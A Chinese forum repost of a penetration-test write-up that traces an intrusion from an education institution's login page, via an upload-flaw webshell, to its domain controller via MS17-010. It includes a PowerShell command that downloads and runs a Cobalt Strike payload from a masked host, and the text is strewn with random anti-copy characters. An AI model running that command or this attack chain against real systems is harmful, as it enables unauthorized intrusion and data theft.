找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2291|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 ]& f+ ]9 `; V( e0 @ 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 $ Y! f2 W* s% @1 U/ ]/ e3 d0 x. w

& x* L" m F. J D+ I1 `- d" ~3 h

6 X; ^8 W" r; q7 A' H   # Y0 A5 r$ g: E

4 j- h+ O8 {( D: g! B1 F* ?

; x6 }# G& a3 M+ v/ x) R 正文4 K( D' L U) c: K' n- n0 m! o7 X

# K$ C. Y! U% `8 E! E

7 k2 a) A* o6 c! M/ E5 |   ) Y& H& n5 p& ^ _' U

( @9 c" U( ]; _- d! h

5 i4 T, f, P2 B 目标:www.xxxx.com(一家教育机构)
# I2 G* @, z. M4 e1 H2 ]* ^
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
+ S5 Q$ w; c9 ]/ \" ~

b+ {4 z3 t% K5 M( O

3 p F8 V0 I; ^, T; k7 ` vshapes= 5 M9 v* I# C: B& F7 }1 I) U

7 ?1 \) l8 I+ s g* R

9 i4 K/ O2 f; d4 {9 W8 Q 进行了简单的信息搜集
3 u# F! p% X j0 [8 K% U& N
( Z: K1 |0 N' X) }1 ^2 s5 t2 P4 z
: o+ C& ~4 U3 W# |% F: m! Y

4 V: U0 `& i2 [8 U+ l8 A

5 q' |) p- G# |" Z8 M% a+ a6 t 子域名搜集 ^; w' {7 P2 i, ^

0 t1 d4 Q* X4 C! y

; n4 F5 ^+ F' n- b7 [ vshapes=7 a7 @$ {6 a9 T7 U/ j. X

0 K3 r$ \8 J3 L" E

6 {9 o, d0 x. T4 f, X, A fofa找资产
C* C( W0 x8 g' x
% H& F- h& o, _$ T9 @% A+ Y$ g
* q& G# _% k; ~' ?

6 E# W# i; l# A K+ \7 p) _

3 O% G8 A: U; u% E8 d vshapes= * q, F! X- L- M# b3 H

4 I4 V5 ?+ {. T" Z; p

! S6 v+ K5 @) k4 p( p 一共七个资产。去重之后只有两个。
+ t) H+ ]/ f+ ~9 }! Z% m
[0 A$ W# c0 I
6 `/ z q% L1 e* D/ D

7 J. j5 g* H9 R5 f

4 x. g, B$ R5 q1 n. f, U* g2 r5 E 目录探测 - V2 [6 h& P, n, R

; ^( a$ i. Q$ c$ x7 @) @

3 o7 S' v3 Q2 m; n8 m vshapes=4 H) v5 N2 d9 t0 {$ O5 t

- X" V+ _% |5 R& D

& Q2 u$ l* O+ B/ t$ o 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* v F6 O" S+ A3 C' K" Z2 O
! S$ `2 K0 k l; u& H
g7 z8 b% [0 W. @1 T; q

0 k# l& y' v. Z) y

9 q9 z8 H9 ]2 b3 ` 我又尝试了通过修改返回包来绕过登录界面' M* j4 v7 d$ |- U; p1 e& ^& V7 a

- E9 Y# J, W! l

1 |/ ?3 Y' U$ R. Q1 S: W& B vshapes= 0 I# L+ t2 S! c4 [ `! m1 k

/ _0 V2 n# P- e

, z8 c) y+ z( `6 N. |1 n" H8 O 还是不行,尝试注入无果! x, P% y7 n- }, T4 Y3 u& ^

. c1 v* I( O! k* M- K

" r) U Z- v* [ vshapes=6 X. p7 ~- c3 }, s3 }

N) W- N0 a% p0 h3 ` P8 A. l

5 x5 x0 V% P$ l! m 不过我目录探测出了一处Spring信息泄露
3 x+ G" h6 n$ o( [, T" D
& `( }3 a1 q( I8 K
E: g: N* F/ A/ A* S+ e( \! @

% T/ w9 _2 P6 t; j. i( ~

, e& P! F, F+ A, z vshapes=' M0 n0 P$ M& L4 D+ v% M# _& m# T _

* P! W4 m% y d* B6 c

v& A) ]8 P8 b9 G2 g 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, V$ K/ o# X0 \ n

2 b" S- t v% l8 [: \

, L" n* O/ F5 ?; D vshapes= " [; }- O u. |- q' `

( g5 ~( J) e8 v3 @) `2 Q. W. N1 ]6 x

/ s& H: s ?* [# B4 P) u/ d; e 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 7 n* a( V& B( W; N9 f& j

4 V0 V3 D! d% R x# e

1 Y/ m- l* y: N' |( A vshapes= ! Z% m. B7 i8 s1 \

' r+ m" ~. F- N& i/ v5 W

* l4 _8 m& D+ s" E( K, L; u3 [7 R 获取有些师傅到这一步就手机抓包电脑测了。5 t# h0 L* V1 C: S3 y

# o8 B# Z% E; w4 T2 Z9 {2 Y

4 X1 ?8 |8 J# N O3 N Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 & J2 P; T- Z% b' A1 y

/ j+ t/ c& w; U0 ^ o% [

' e8 K; S$ ^4 M# e 其中在一个公众号发现了小程序,可以进行注册。: {, O. }& A; J0 k) ]

/ T$ w7 _! u5 i; P2 X! `' c% O$ v- |

% g* l+ C ] q5 c: z M% `% S 看到了头像上传,尝试上传获取WebShell% W# Z) p( e) y( |% K

+ l. z$ ^" G4 w8 ?

6 w0 g0 q0 T' s; Z3 A$ S8 ] vshapes=) R$ E H* K" g/ W" M

8 G$ `+ P# n- U

/ ^, f5 h& b" ^/ I3 e1 \" _% ^ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 3 M1 o% Y3 O4 q9 g

/ X* h2 E# E1 {

$ W% F; p4 C% v5 `* R! V vshapes= ; W" [* g* S$ ]8 z

: ^/ P$ w" M& E/ o @

L* n; ^4 |$ [& t 然后上了大马 / {$ G+ V- o; L5 R R& }

8 m. w+ o5 c( \( L

3 E$ S8 O& r8 ]8 K, X% [5 F vshapes= - @$ _" o1 U2 l/ Z$ E0 @% Z# p0 V

" [1 H. M7 y3 @! V; o

+ z8 S+ Q0 T0 w: v9 k vshapes= 5 b( A9 Y' T. a) z

( u5 X2 M9 y; ?* M

5 K$ B" {, n$ e( q# ~ 通过翻找文件发现数据库账号密码+ l. |0 Q' b4 y, K9 A

4 d% h0 {" m7 P' \1 I

1 M" v+ ?1 a+ M: j vshapes= : Y9 \9 A% {0 t. _, K' e

2 I5 G5 n9 ~! G# K& ~, r& `6 d4 B! S. j

+ l/ |7 a5 }7 j7 J7 j% p --内网渗透 ( S3 p% ]) K8 a a @

/ U$ l4 e4 Y7 R

; X1 t* c, |" k, s& _, z z 直接通过powershell执行 cs上线# [& T: X6 C: c" T* b7 ^

! g3 ?$ B8 V% C4 o0 C' i, ?1 P0 A

& s5 R2 J7 E" X3 }6 V( V powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" # C$ H1 k* }4 x4 W

2 w6 n/ h. e) |* h9 z- [; L

. i7 y) ?& h$ F4 { vshapes=$ i" `. C+ M: n" ?

0 R* X. W: A! e* o, S; w7 e

, R7 N/ g/ T# D) U0 s) D, H/ b: k 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 4 M4 d& H1 I) ]

7 h; M- o0 V- X0 z& y: s+ n

5 _* L0 K" G$ R; m R% e vshapes= |: z/ L+ U% q$ z

1 o9 k6 J: M8 r# Q* ^2 T! P7 W% H# t

+ L$ T1 ^; I# }9 u# N3 S 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
# c. _1 r I- M7 ]* ? ~2 R3 ~" s
3 a T. ~. t4 n7 U4 d: E' o
, d! z% ]. J# Z% ]7 i; N: G9 f5 Y
j7 e/ {! _; ~% c7 v( E" K

+ i. X0 | J! M. p6 Y3 ~! Q$ o

4 U% y# X$ j- f6 ~( l- g vshapes=7 Q& Z; w9 Z$ ?: g# K

- k# E! t; N3 i. Q8 K. P" w

j, U9 B# F$ ^. r 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ Y( J; R6 W) @3 m6 p/ y. |7 }
; N+ m0 P' X; s" z8 ~3 s5 D4 b+ Z
8 k4 ~- i* k; U P4 k; B

- F& n; m5 {+ F9 _! f" ]

7 P8 z- G% a2 @) r& t vshapes=; H) @5 G7 P$ k4 Q. h

1 Q) R* }5 d( l5 z

' S0 b6 q8 |4 l
- {( e/ W9 S0 D# Q# W, S0 m
1 A; _- w1 q9 s0 K' N g/ Z
* w0 Z( X! c9 q$ a* W

/ j G$ e: i% }# E

3 Z& @) d! D& l# a  . q' m: b) K* s3 i+ G+ g! n2 t

( h I0 Z" \. y9 H

/ x) J0 Z! [% u- E 小结% W; i3 u& N6 z7 P

: d( u! u& i( n2 O d$ R3 P

5 w$ E# a) N. ]( ]+ h  6 L. g; h- y/ K0 K# M

5 ]0 U& X2 T9 \: M: I0 N

* E! e' B* K& t2 Q) } \: C 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! , o) }8 I: x5 b: m

& i; y- C: p4 e5 \ H- c

5 R) q% [( d/ V. G" A+ D0 i) V   . {; L- l9 s/ c" R) H2 ]' m

1 S% d: n$ L6 U7 G
    * D( z2 D) f% c4 i1 K! K
  • 0 v$ Y7 _5 s* c9 u- L, g/ R  6 g6 a1 L3 M t
  • / b0 ~+ k# D3 ]
  • 1 d! h8 b3 I7 m7 w/ F$ ?   . t( u; e" l+ Q m9 v
  • % `# k- W# ]/ M) @$ o) x& X
% V- `# j, M1 n" B% t2 P1 N

- y# S4 G7 R9 b8 P* n# r" w 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html, B( b7 z5 V4 X/ e5 [& C. }

* v2 f9 y# h& B* l& H8 P

1 |& r( Q% R$ W; z4 C, P  % ^$ w6 c W9 J) J2 {7 e' l4 b

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表